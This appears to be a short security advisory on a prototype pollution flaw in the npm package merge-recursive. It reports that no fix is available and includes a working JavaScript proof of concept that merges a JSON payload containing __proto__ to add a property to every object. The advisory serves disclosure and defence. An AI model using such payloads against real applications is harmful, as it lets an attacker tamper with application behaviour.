Prototype Pollution in merge-recursive

All versions of merge-recursive are vulnerable to Prototype Pollution. When malicious user input is merged with another object it allows the attacker to modify the prototype of Object via __proto__ causing the addition or modification of an existing property.

Proof of concept:

var merge = require('merge-recursive').recursive;
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Recommendation

There is currently no fix available.